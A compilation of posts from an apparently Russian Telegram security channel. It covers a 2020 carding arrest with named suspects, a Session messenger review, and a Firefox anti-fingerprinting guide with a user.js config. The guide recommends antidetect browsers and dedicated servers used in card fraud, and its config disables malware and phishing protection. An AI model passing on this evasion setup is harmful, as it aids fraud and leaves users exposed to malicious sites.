В РФ задержана большая группа подозреваемая в кардинге

В ночь с 23 на 24 прошла крупная операция ФСБ по задержанию “группы”, которая по версии следствия, продавала через интернет-магазины краденые банковские карты. Люди были задержаны в Крыму, Северной Осетии, Калужской, Ленинградской,
Московской, Псковской, Самарской и Тамбовской областях, а также в
Москве, Санкт-Петербурге и Севастополе. Всего задержали более 30 человек.

Среди задержанных Алексей Строганов (Flint24) — бывший модератор форума carder.org и «руководитель цеха по производству поддельных пластиковых карточек» для realplastic.org,
за что в 2006 году был осужден на 6 лет лишения свободы. Освободился «по звонку» в 2008 году.

По версии американского следствия, Строганов уже находился в международном розыске, о чём знал и не выезжал за границу, опасаясь американского возмездия.

Более того, в опредленных кругах бытует информация, что ребята исправно “делились” на самом
высоком уровне. Некоторые имели “ксивы” и “мандаты”, вели роскошный образ жизни. Другие работали тихо.

Важно другое: в РФ существует “каста” невыездных. Людей, подозреваемых западных правосудием в совершении каких-либо преступлений. По негласным законам существовал паритет: ты не трогаешь своих, мы не трогаем тебя – только делись. Тем не менее, паритет регулярно нарушался силовиками и некоторые известные “деятели андеграунда” регулярно страдали от крупных поборов, несмотря на то, что не вели противозаконной деятельности годами.

Если в 2008 мы все кричали “Ура, Россия!” и поддерживали державу во всех начинаниях, то сейчас
становится понятно, что жадность и алчность чиновников переходит все границы и никаких писанных или не писанных законов и понятий уже не осталось.
Лично у меня больше доверия руководству РФ и его прихвостням больше нет. Шалом, Израиль.
Остается лишь вопрос: quid custodia ipsos custodien?

Вот неполный список задержанных с 23 на 24 марта по подозрению в торговле картами. Нечего сказать, список внушительный, сразу весь “олдскул” отечественного кардинга, а также другие весьма талантливые персонажи.

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/083a9af0-f6ce-46c8-bd42-ff16a325b1ea

Лицо Бобин А.С. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 10:00 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/f2c2ba1d-8df6-496a-bd67-69e3025872c7

Лицо Юшковский А.А. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 16:00 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/83cfa9f3-c0aa-4734-856b-2f7b09b0d8c4

Лицо Шувалов А.В. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 16:00 Назначено (?)

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/70025d6d-b5b1-4b6d-be9d-016969d24abd

Лицо Малинин М.А. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 16:00 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/e050d0a9-8799-42ff-b914-c40178abfd65

Лицо Селиванов Г.В. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 16:20 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/b10673db-5554-458d-8e29-0958e9002b0e

Лицо Строганов А.Т. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 17:40 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/c7d54455-40b6-452a-ad5c-56dd9c0c081e

Лицо Галкин А.В. — Ст. 187, Ч. 2

20.03.2020 18:00 Назначено (?)

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/38a4e3a6-c6d4-4591-b669-e6e09a81f830

Лицо Карпунин С.В. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 18:30 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/40f127a7-e46b-4a42-904f-69b5c65880cf

Лицо Федотов И.О. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 18:30 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/d137c1a2-212a-452a-90e9-0749963f0ec4

Лицо Светличный Л.И. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

21.03.2020 12:00 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/39fb7528-6a8c-45ac-a78e-2eb0d6e1977c

Лицо Мерлин Э.А. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

20.03.2020 17:30 Отложено

21.03.2020 12:00 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/f2cdc497-8e91-4c0c-82ab-75bdcf6515a1

Лицо Васильев Р.Р. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

21.03.2020 12:30 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/002dd55f-fc8d-460c-afa7-f0f731deaeea

Лицо Синицын А.В. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

21.03.2020 12:30 Удовлетворено

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/03aefadb-2892-47f1-87c1-5ce0b61d433b

Лицо Белай В.В. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

21.03.2020 12:30 Удовлетворено

23.03.2020 Апелляционная жалоба

https://mos-gorsud.ru/rs/tverskoj/services/cases/criminal-materials/details/e4a8dece-da91-4325-b604-9f7d523a57e8

Лицо Ахметов В.А. — Ст. 187, Ч. 2

Об избрании меры пресечения в виде заключения под стражу (п.1 ч.2 ст.29 УПК РФ; ст.108 УПК РФ)

21.03.2020 13:00 Удовлетворено

Список не полный и будет дополнятся.

Session: новый децентрализованный мессенджер с end-to-end encryption

Ой люди добрые, что творится. Аресты, отсутствие анонимности, подозрения и сплетни. А тут еще коронавирус. Какое уж тут ИБ, казалось бы. Хочется побыстрее последовать совету Маши Распутиной и отпустить себя в Гималаи. Ну или как минимум свалить на Бали.

Но не все так печально.

После недавних слухов о том, что Телеграм предоставил доступ к переписке
компетентным органам, причем не только иностранным, но и российским, хочется найти достойную альтернативу творению Дурова.

И альтернативы есть.

Сегодня мы рассмотрим нового кандидата на звание “безопасный”. Встречайте, Session.

По заявкам авторов Session представляет собой мессенджер со сквозным шифрованием, удаляющий конфеденицальные метаданные.

Что же он из себя представляет?

Преимущества:

1) Базируется на Signal

2) Не требует ни телефона, ни e-mail, ни иных данных для регистрации

3) Формально децентрализованный мессенджер (это что-то типа скрещенного Signal и Tox, только оформлено в нормальном виде)

4) Есть под все ОС: Windows, MacOS, Linux, Android, iOS

5) Oткрытый исходный код

6) Не должен сохранять метаданные, децентрализированный и проч. фишки,
связанные с этим

Вердикт: должен быть достаточно анонимным

Однако есть и недостатки:

1) Зависим от Google Services, на прошивках без них не будет работать.
Это связано с fork’ом от Signal (попытка создать форк без
google-сервисов провалилась, разработчики Signal пригрозили судом: из
этого можно сделать очень интересные выводы. Именно по этому я бы относился к этому мессенджеру с некоторой настороженностью.

2) Из-за форка от Signal не поддерживает SOCKS5, поэтому скрыть IP или заставить работать через TOR легко не получится. На Android эту проблему можно решить, а вот на iOS это будет сделать уже сложнее и скорее всего (для постоянной работы).

Вывод. Этот мессенджер пока сколь-либо детально не изучался, не тестировался и wp толком тоже пока не изучалась. Поэтому тем, кто решил все же выбрать этот мессенджер следует действовать очень осторожно. Неизвестно общее количество нод, неизвестно количество нод в вашей стране (например, Tox по этому показателю крайне плох). Неизвестен уровень авторов и реальная цель создания ими этого мессенджера.

https://getsession.org
https://loki.network
https://loki.foundation

Исходники:

https://github.com/Loki-project
https://github.com/loki-project/session-desktop
https://github.com/loki-project/session-ios
https://github.com/loki-project/session-android
https://github.com/loki-project/session-android-service

Вас ебали, ебут и будут ебать. Государство, хакеры, чиновники.
Остановить эту свингер-пати невозможно. Но я научу предохраняться. Я покажу и расскажу вам то о чём не пишет журнал “Хакер” и не рассказывают или просто не знают другие каналы. Здесь ты найдешь подборку лучших статей и видеоматериалов на тему кибербезопасности. Все, от аудита Wi-Fi до вскрытия автомобилей (если вы потеряли ключи). А также горячие новости с авторскими коментариями.

По материалам sporaw.livejournal.com

Что такое фингерпринт и для чего он нужен? Основные настройки браузера для анонимности в сети. Часть 1.

Актуальной проблемой во всем мире на сегодняшний день является защита и безопасность персональных данных в сети. Повсеместное применение технологий позволяет легко собирать личную информацию. Кроме этого, пользователи самостоятельно делятся в социальных сетях, мессенджерах, при переписке по электронной почте и на других онлайн-платформах, зачастую даже не подозревая о том, что их данные могут попасть не в те руки.

В современном мире мало кого удивишь тем, что отслеживается всё и все: смартфоны, планшеты, компьютеры, умные устройства, программное обеспечение и т. д. С одной стороны, компании, собирающие сведения, делают все для того, чтобы улучшить тот или иной сервис, сделать этот прекрасный мир еще лучше и повысить качество пользовательского взаимодействия. С другой стороны – они зарабатывают на пользователях, анализируют поведенческие факторы, формируют характерные шаблоны и манипулируют для достижения максимальной выгоды.

В первой части речь пойдет о том, что такое фингерпринты, настройке браузера и защите своей личности в сети.

Fingerprint или иногда foorptrint – это полный цифровой отпечаток устройства, состоящий из информации о вашей операционной системе, настройках, активных браузерах, установленных плагинах и т.д. Такой отпечаток представлен в виде уникального кода или картинки.

В сфере информационных технологии фингерпринтом принято называть возможность однозначно идентифицировать человека через его устройство, настройки, программное обеспечение и другие пользовательские характеристики.

В чем отличие от cookies? Начнем с того, что куки актуальны в пределах одного домена, в то время как фингерпринт позволяет отслеживать источники перехода на целевой сайт и пути переходов с этого сайта. Куки, включая вечные, можно очистить или блокировать, что не является трудоемким процессом. В свою очередь фингерпринты можно лишь подменить.

Технологию фингерпринтинга можно трактовать, как существенную уязвимость в информационной безопасности и в то же время, как нарушение приватности и конфиденциальности пользователей. Мы посещаем те или иные сайты, у многих из нас в браузере есть персональные настройки: шрифты, плагины, закладки, дополнения и расширения, разрешения экрана, расположение окон, размещение навигационных кнопок и т. д. Сочетание этих элементов представляет собой уникальный цифровой отпечаток устройства и может быть условно сопоставлено с биометрическими данными человека, а именно, отпечатками пальцев.

Где применяется и для чего используется фингерпринт браузера?

Многие из нас не видят никакой проблемы в том, что каждый шаг и каждое действие, находится под контролем и оседает в “больших данных”. Другие, наоборот, чрезвычайно озабочены своей конфиденциальностью, что разрабатывают специальные средства и программы, которые проверяют, затрудняют, искажают и блокируют сбор информации.

Отпечатки цифровых устройств применяются для предотвращения мошенничества и «кражи личности». Пользователь сети Интернет сам того не подозревая предоставляет данные о себе, без какого-либо на то согласия. С повышением количества собранных данных формируется профиль человека, который способен содержать в себе:

·      Пол;

·      возраст;

·      семейное положение;

·      политические взгляды;

·      финансовое состояние;

·      интересы;

·      привычки и т. д.

Казалось бы, это информация носит лишь поверхностный характер, без привязки к конкретному человеку, т.е. есть некоторый субъект имеющий определенные параметры и отношения к тем или иным вещам, но кто именно – неизвестно. Но это лишь до поры до времени, стоит лишь раз человеку где-нибудь указать реальные персональные данные, например ФИО, телефон, адрес, фингерпринт позволит компаниям полностью Вас идентифицировать и тем самым дополнить сформированный профиль.

Пользователи лишены возможности запретить сайтам такой вид сбора данных. Впоследствии собранные базы данных отпечатков браузеров могут передаваться другим компаниям для совместного использования, что неизбежно приводит к идентификации пользователей.

Теперь обсудим, как это обходить

VPN и прокси-серверы

Здесь коротко. VPN – самый простой метод обхода региональных запретов. Меняет ваш IP на доступный на сервисе. Не защищает от множества трекеров и не влияет на уже подхваченные куки.

Прокси – бесплатная прокладка, которая не шифрует ваш трафик. Не скупитесь на хороший многоканальный ВПН – и включайте его даже переходя на выделенный сервер, о котором мы поговорим дальше

Браузеры и дополнения к ним

Самым надежным считается Firefox. На него устанавливаем плагины:

raleyes — избавит от слежки через CDN.

Privacy Badger — избавляет от трекеров, защищает конфиденциальность.

HTTPS Everywhere — защита от MITM в сети.

ScriptSafe — расширение удаляет всё лишнее.

Готовый конфиг: https://pastebin.com/73QwJFeK

Privacy Settings — упрощает работу с конфигами + есть режим приватности.

User Agent Swither – плагин осуществляет подмену идентификации браузера.

Antidetect – аналогичный предыдущему плагин с более расширенными настройками. Платный и достаточно дорогой.

Ghoster – плагин блокирующий трекеры аналитики, рекламы и остальные маячки.

Multiloginapp – платформа, созданная для подмены разных браузерных футпринтов. Программа создана для работы с большим количеством браузерных профилей. Каждый профиль находится в своем “контейнере” и вариант того, что с одного браузерного перейдет история, куки и фингерпринты исключена.

Также существуют специально собранные браузеры для анонимного веб серфинга:

TOR – самый известный и популярный среди таких.

Pale Moon– браузер с открытым кодом на основе Firefox.

Вручную

Сделать свой цифровой след менее уникальным помогут ручные изменения, такие как:

·      Изменение часового пояса устройства;

·      Установка другого языка операционной системы устройства;

·      Установка другого языка браузера;

·      Изменение разрешения экрана устройства;

·      Изменение масштаба веб-страницы;

Отключение исполнения Flash, Javascript и WebGL.

Выделенные сервера

Использование дедиков (от слова dedicated server) до сих пор считается одним из самым эффективных способов сохранить свою анонимность. Представляет собой отдельную физическую машину, с которой не передаются никакие данные на вашу основную и рабочую.

Плюсы: Настройка HTTP/SOCKS-прокси или SSH/VPN-соединения на выбор; Контроль истории запросов; Спасает при атаке через Flash, Java, JavaScript, если использовать удаленный браузер;

Минусы: Относительно высокая стоимость Необходимы технические знания для правильной настройки.

Главная причина популярности и эффективности такого метода заключается в том, что такой виртуальный компьютер является совершенно новыми и чистым для интернета, работает круглосуточно и не передает никакой информации о конечном пользователе и характеристиках его компьютера (говорят Facebook отслеживает даже MAC адрес).

Настройка браузера с помощью страницы about:config

На этой странице находятся ссылки на разные ресурсы браузера.

Не буду углубляться в каждый ресурс, просто наведу несколько любопытных и полезных примеров.

about:support

Тут можно посмотреть детальную информацию о браузере, user-agent, поддерживается ли несколько потоков или например композитный менеджер для отрисовки интерфейса.

Тут же можно узнать путь к вашему профилю(Profile Directory). Зачем он вам будет нужен, я подробнее опишу ниже. К сожалению, на мобильной версии не показан путь к папке профиля, поэтому поделюсь с вами своим(актуально только для андроид).
/data/data/org.mozilla.firefox/files/mozilla/*.default

Папка профиля состоит из 2 частей — * — рандомная строка(уникальный набор букв для каждого девайса) + .default — для профиля по умолчанию

about:memory

Тут можно посмотреть, на что расходуется память браузера, в основном полезно web frontend разработчикам.

about:addons

Страница с вашими расширениями, доступна также из графического меню.

about:networking

Страница с детальной информацией о посещенных сайтах, dns и websockets. Тоже будет полезна web разработчикам.

about:config

И наконец, страница, где находятся все доступные настройки браузера в формате ключ — значение.

Детальные настройки браузера

В about:config есть графический редактор значений, там все должно быть понятно и так.

А вот файл user.js, как видно из его расширения, предполагает что все настройки будут в формате, понятном javascript парсеру. Например:

user_pref("browser.bookmarks.restore_default_bookmarks", false);

user_pref— это объект, содержащий в себе все настройки.

Все, что в кавычках “browser.bookmarks.restore_default_bookmarks” — это ключ.

После запятой идет значение.

Ключ всегда строка, а вот значение может быть разных типов, строки, числа или булевое значение ложь/истина(true/false).

Настройка показанная в примере отвечает за восстановление закладок по умолчанию и имеет значение ложь. Если поменять данное значение, то все ваши закладки удалятся и восстановится набор закладок по умолчанию.

Другие настройки

user_pref("browser.bookmarks.showMobileBookmarks", true);

Данная настройка позволяет на десктопе увидеть ваши закладки с мобильной версии, если у вас подключена синхронизация.

user_pref("browser.ctrlTab.previews", true);

При переключении вкладок отображаются превью страниц.

user_pref("browser.download.autohideButton", false);
user_pref("browser.download.panel.shown", true);

Настройки, отвечающие за отображение загрузок браузера.

user_pref("browser.library.activity-stream.enabled", false);
user_pref("browser.newtabpage.activity-stream.feeds.places", true);
user_pref("browser.newtabpage.activity-stream.feeds.section.highlights", false);
user_pref("browser.newtabpage.activity-stream.feeds.telemetry", false);
user_pref("browser.newtabpage.activity-stream.filterAdult", false);
user_pref("browser.newtabpage.activity-stream.prerender", false);
user_pref("browser.newtabpage.activity-stream.showSponsored", false);
user_pref("browser.newtabpage.activity-stream.telemetry", false);
user_pref("browser.newtabpage.activity-stream.telemetry.ping.endpoint", "");
user_pref("browser.newtabpage.activity-stream.tippyTop.service.endpoint", "");
user_pref("browser.newtabpage.activity-stream.topSitesRows", 3);
user_pref("browser.newtabpage.enhanced", true);

Все настройки activity-stream отвечают за вашу активность. “newtabpage” — за отображение контента на новой вкладке. Почти все я отключил, кроме “feeds.places”, отвечающих за отображение недавно посещенных страниц на новой вкладке. Кстати, все настройки, содержащие слово “endpoint” отвечают за адрес, на который посылаются данные. Если использовать пустую строку, то данные передаваться не будут.

user_pref("browser.ping-centre.telemetry", false);

Одна из настроек, отвечающих за телеметрию. Я ее отключаю для ускорения серфинга, так как на любое действие тратятся ресурсы, даже если оно работает параллельно. Так как я не понаслышке знаю, как профилировать программы и насколько при этом проседает производительность, то лучше уж обойтись без этого.

user_pref("browser.safebrowsing.blockedURIs.enabled", false);
user_pref("browser.safebrowsing.downloads.enabled", false);
user_pref("browser.safebrowsing.downloads.remote.block_dangerous", false);
user_pref("browser.safebrowsing.downloads.remote.block_dangerous_host", false);
user_pref("browser.safebrowsing.downloads.remote.block_potentially_unwanted", false);
user_pref("browser.safebrowsing.downloads.remote.block_uncommon", false);
user_pref("browser.safebrowsing.downloads.remote.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.phishing.enabled", false);
user_pref("browser.safebrowsing.provider.google.advisoryURL", "");
user_pref("browser.safebrowsing.provider.google.gethashURL", "");
user_pref("browser.safebrowsing.provider.google.lists", "");
user_pref("browser.safebrowsing.provider.google.pver", "");
user_pref("browser.safebrowsing.provider.google.reportMalwareMistakeURL", "");
user_pref("browser.safebrowsing.provider.google.reportPhishMistakeURL", "");
user_pref("browser.safebrowsing.provider.google.reportURL", "");
user_pref("browser.safebrowsing.provider.google.updateURL", "");
user_pref("browser.safebrowsing.provider.google4.advisoryName", "");
user_pref("browser.safebrowsing.provider.google4.advisoryURL", "");
user_pref("browser.safebrowsing.provider.google4.dataSharingURL", "");
user_pref("browser.safebrowsing.provider.google4.gethashURL", "");
user_pref("browser.safebrowsing.provider.google4.lastupdatetime", "");
user_pref("browser.safebrowsing.provider.google4.lists", "");
user_pref("browser.safebrowsing.provider.google4.nextupdatetime", "");
user_pref("browser.safebrowsing.provider.google4.pver", "");
user_pref("browser.safebrowsing.provider.google4.reportMalwareMistakeURL", "");
user_pref("browser.safebrowsing.provider.google4.reportPhishMistakeURL", "");
user_pref("browser.safebrowsing.provider.google4.reportURL", "");
user_pref("browser.safebrowsing.provider.google4.updateURL", "");
user_pref("browser.safebrowsing.provider.mozilla.gethashURL", "");
user_pref("browser.safebrowsing.provider.mozilla.lists", "");
user_pref("browser.safebrowsing.provider.mozilla.pver", "");
user_pref("browser.safebrowsing.provider.mozilla.updateURL", "");

“safebrowsing” — данные настроки отвечают за проверку посещаемых сайтов, чтобы убедится что они безопасные. Данная проверка предполагает проверку хоста сайта в локальной базе на черный список и проверку загруженых файлов на серверах гугл.(Спасибо dartraiden за подсказку) В случае положительного ответа вместо сайта показывается служебная страница с предупреждением. Я данную проверку отключил для ускорения серфинга. Возможно, тем, кто пользуется ОС Windows, этого делать не стоит.

user_pref("browser.search.countryCode", "US");
user_pref("browser.search.geoSpecificDefaults", false);
user_pref("browser.search.geoSpecificDefaults.url", "");
user_pref("browser.search.geoip.url", "");
user_pref("browser.search.hiddenOneOffs", "Bing,Amazon.com,Twitter");
user_pref("browser.search.region", "US");
user_pref("geo.wifi.uri", "");

Настройки поиска. Я поставил регион US, для анонимности поисковых запросов. Так же отключил местоположение для поиска (“geo”).

user_pref("browser.tabs.loadInBackground", false);
user_pref("browser.tabs.tabMinWidth", 30);
user_pref("browser.tabs.warnOnClose", false);

Настройки вкладок. Хочу отдельно отметить “tabMinWidth”. В хроме, если открываешь множество вкладок, текст исчезает. А в Firefox данная настройка отвечает за минимальную длину вкладки. И если открыто больше вкладок, то они все равно не уменьшаются, а просто прячутся и появляются дополнительные кнопки управления вкладками. Для меня данная система очень удобна, так как я постоянно открываю множество страниц с одного и того же сайта и без текста нужно постоянно угадывать, какая именно страница где.

user_pref("browser.urlbar.clickSelectsAll", true);
user_pref("browser.urlbar.maxRichResults", 15);
user_pref("browser.urlbar.trimURLs", false);

При клике на адресную строку выделяется весь адрес, а не текущее слово. А также не скрывается https в адресной строке.

user_pref("datareporting.healthreport.uploadEnabled", false);
user_pref("datareporting.policy.dataSubmissionEnabled", false);
user_pref("datareporting.policy.firstRunURL", "");

Отчеты корпорации Mozilla

user_pref("device.sensors.enabled", false);
user_pref("device.sensors.motion.enabled", false);
user_pref("device.sensors.orientation.enabled", false);

Это скорее для мобильной версии, но иногда в ноутбуках тоже есть какие-то сенсоры.

user_pref("devtools.aboutdebugging.showSystemAddons", true);
user_pref("devtools.onboarding.telemetry.logged", false);
user_pref("devtools.theme", "dark");
user_pref("devtools.toolbox.splitconsoleEnabled", false);

Настройки инструментов разработчика.

user_pref("dom.push.enabled", false);
user_pref("permissions.default.desktop-notification", 2);
user_pref("permissions.default.geo", 2);

Дублирует отключение уведомлений из графического меню

user_pref("experiments.activeExperiment", false);
user_pref("experiments.enabled", false);
user_pref("experiments.supported", false);

Не хочется мне эксперементов. Настройка на любителя).

user_pref("extensions.pocket.enabled", false);
user_pref("extensions.ui.dictionary.hidden", false);
user_pref("extensions.ui.experiment.hidden", true);
user_pref("extensions.ui.locale.hidden", true);
user_pref("extensions.webextensions.remote", true);

Настройки расширений. Pocket выключаем.

user_pref("findbar.highlightAll", true);
user_pref("font.internaluseonly.changed", true);
user_pref("font.minimum-size.x-western", 10);
user_pref("font.name.monospace.x-western", "Hack");
user_pref("font.name.sans-serif.x-western", "Hack");
user_pref("font.name.serif.x-western", "Hack");

Настройки шрифта, дублируют графические настройки плавного скролла, подобранно эксперементальным путем.

user_pref("general.smoothScroll.durationToIntervalRatio", 1000);
user_pref("general.smoothScroll.lines.durationMaxMS", 100);
user_pref("general.smoothScroll.lines.durationMinMS", 100);
user_pref("general.smoothScroll.mouseWheel.durationMaxMS", 150);
user_pref("general.smoothScroll.mouseWheel.durationMinMS", 50);
user_pref("general.smoothScroll.other", false);
user_pref("general.smoothScroll.pixels", false);
user_pref("general.smoothScroll.scrollbars.durationMaxMS", 100);
user_pref("general.smoothScroll.scrollbars.durationMinMS", 100);

user_pref("general.useragent.override", "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/64.0");
user_pref("general.useragent.vendor", "");
user_pref("general.useragent.vendorSub", "");

Настройки User agent, если нету особой необходимости, их лучше не трогать

user_pref("general.warnOnAboutConfig", false);

Отключить окно предупреждения при посещении about:config

user_pref("gfx.use_text_smoothing_setting", true);
user_pref("gfx.webrender.enabled", true);
user_pref("gfx.webrender.highlight-painted-layers", false);
user_pref("layers.acceleration.force-enabled", true);

Ускорение отрисовки.

user_pref("intl.accept_languages", "en-us,en,uk,ru");
user_pref("intl.locale.requested", "en-US");

Данная информация предназначена для автоматического выбора языка на сайте, хотя сами сайты очень редко обращают внимание на эту настройку. Надеюсь в будущем ситуация изменится.

user_pref("layout.css.devPixelsPerPx", "1.25");
user_pref("layout.css.osx-font-smoothing.enabled", true);
user_pref("layout.word_select.stop_at_punctuation", true);

Особо хочется выделить настройку “devPixelsPerPx”. Данная настройка отвечает за масштабирование интерфейса и будет особо полезна людям со слабым зрением или на компьютерах с большим разрешением экрана. По умолчанию идет значение “1”.

user_pref("media.autoplay.enabled", false);
user_pref("media.av1.enabled", true);

Настройки, связанные с видео. Отключает автовоспроизведение и включает эксперементальную поддержку нового кодека AV1.

user_pref("network.allow-experiments", false);
user_pref("network.cookie.prefsMigrated", true);
user_pref("network.dns.disablePrefetch", true);
user_pref("network.http.speculative-parallel-limit", 0);
user_pref("network.predictor.enabled", false);
user_pref("network.prefetch-next", false);
user_pref("network.security.esni.enabled", true);
user_pref("network.tcp.tcp_fastopen_enable", true);
user_pref("network.trr.mode", 2);
user_pref("network.trr.uri", "https://mozilla.cloudflare-dns.com/dns-query");
user_pref("network.warnOnAboutNetworking", false);

Данную группу настроек хочу разобрать подробнее.

“dns.disablePrefetch” и “predictor.enabled” отвечают за предварительное посещение ссылок на странице, чтобы ускорить загрузку, если пользователь захочет перейти по какой-то из ссылок. Если интернет медленный, то оно только ухудшает ситуацию, особенно в мобильной версии где-то в метро.

“tcp.tcp_fastopen_enable” включает TCP Fast Open

“trr.mode” отвечает за DNS Over HTTPS. Значение 0 полностью отключает DoH; 1 — используется DNS или DoH, в зависимости от того, что быстрее; 2 — используется DoH по умолчанию, а DNS как запасной вариант; 3 — используется только DoH; 4 — режим зеркалирования при котором DoH и DNS задействованы параллельно.

Ну а “trr.uri” отвечает за сервер, на который браузер стучится для получения IP адреса посещаемых сайтов.

“security.esni.enabled” отвечает за Encrypted SNI

user_pref("privacy.donottrackheader.enabled", true);
user_pref("privacy.firstparty.isolate", true);
// Отключает запоминание уровня зума для сайта 
user_pref("privacy.resistFingerprinting", true);
user_pref("privacy.resistFingerprinting.autoDeclineNoUserInputCanvasPrompts", false);

Настройки приватности.

user_pref("privacy.userContext.enabled", true);
user_pref("privacy.userContext.longPressBehavior", 2);
user_pref("privacy.userContext.ui.enabled", true);

“userContext” включает Multi-Account Containers.

Данное дополнение изолирует куки и историю посещений в отдельные контейнеры. К сожалению, только для десктопа. Я так изолировал все сервисы гугла, фейсбука и нескольких других важных сервисов отдельно. Так же, если дополнительно установить расширение Multi-Account Containers, то с его помощью можно привязывать сайты к контейнерам. Даже если с одного контейнера открываешь ссылку, привязанную к другому контейнеру, она открывается в этом контейнере, в новой вкладке. Очень удобно.

user_pref("reader.color_scheme", "dark");
user_pref("reader.content_width", 12);

ВFirefox есть очень удобный режим чтения страницы, при котором все, кроме текста удаляется. Он пока далек от идеала, вырезает некоторые тэги с текстом, но все равно им очень удобно пользоваться. Активировать его можно тут:

user_pref("security.ssl.errorReporting.automatic", true);
user_pref("toolkit.identity.enabled", false);
user_pref("toolkit.telemetry.archive.enabled", false);
user_pref("toolkit.telemetry.bhrPing.enabled", false);
user_pref("toolkit.telemetry.coverage.opt-out", false);
user_pref("toolkit.telemetry.enabled", false);
user_pref("toolkit.telemetry.firstShutdownPing.enabled", false);
user_pref("toolkit.telemetry.hybridContent.enabled", false);
user_pref("toolkit.telemetry.infoURL", "");
user_pref("toolkit.telemetry.newProfilePing.enabled", false);
user_pref("toolkit.telemetry.reportingpolicy.firstRun", false);
user_pref("toolkit.telemetry.server", "");
user_pref("toolkit.telemetry.shutdownPingSender.enabled", false);
user_pref("toolkit.telemetry.unified", false);
user_pref("toolkit.telemetry.updatePing.enabled", false);

Разнообразная телеметрия. Опять 🙂

user_pref("widget.chrome.allow-gtk-dark-theme", true);
user_pref("widget.content.allow-gtk-dark-theme", true);
// user_pref("widget.content.gtk-theme-override", "Adwaita:light");

Как скрыть (изменить) отпечаток браузера?

Существуют защитные меры, при использовании браузеров, но ни один из них не сработает на все 100%. И возникает логический вопрос: «Имеет ли смысл использовать какое-то специализированное программное обеспечение или устанавливать расширения блокирующие те или иные процессы при посещении сайтов?» Ответ будет неоднозначным, поскольку возникает своего рода диссонанс.

В то время, когда пытаетесь бороться с отслеживанием и применяете особые настройки браузера и специальное ПО – Вы однозначно повышаете уникальность своего цифрового отпечатка устройства, тем самым позволяя с большей вероятностью идентифицировать Вас и сформировать профиль пользователя.

Неоднократные исследования подтверждали, что компьютеры и программное обеспечение с настройками «по умолчанию» сложнее идентифицировать и «привязать» к конкретному человеку, в то время, как даже небольшие изменения имеют обратный эффект.

На практике, наиболее эффективной защитой является использование Tor Browser, разработчики, которого прикладывают довольно много усилий для снижения уникальности отпечатков. Для повседневного использования, хорошим вариантом будет использование такого расширения, как Privacy Badger. С помощью него можно снизить уровень отслеживания и количество передаваемой информации. Для еще большей уверенности и защиты конфиденциальность все это необходимо использовать на виртуальной машине.

Все эти методы имеют место, однако для рядового пользователя такие действия создают определенные трудности и пустую трату времени.

Если тема для Вас является весьма интересной и актуальной посмотрите видео от Ufocoder, где он довольно подробно рассказывает и показывает, как работает технология фингерпринта и можно ли с этим бороться:

В следующей статье мы рассмотрим способы подмены фингерпринтов, а так же другие “анонимные” браузеры.

Вас ебали, ебут и будут ебать. Государство, хакеры, чиновники.

Остановить эту свингер-пати невозможно. Но я научу предохраняться. Я покажу и расскажу вам то о чём не пишет журнал “Хакер” и не рассказывают или просто не знают другие каналы. Здесь ты найдешь подборку лучших статей и видеоматериалов на тему кибербезопасности. Все, от аудита Wi-Fi до вскрытия автомобилей (если вы потеряли ключи). А также горячие новости с авторскими коментариями.

Обо всем этом вам расскажу только я на канале @cybersecs

Шифруем свои файлы удалённо через телеграм. Python 3.8

Я уже давно перестал доверять Дурову и его детищу. Слишком много слухов и подозрений витает вокруг. Тем не менее, Телеграм остается удобной програмой для общения и непревзойденным по функционалу клиентом.

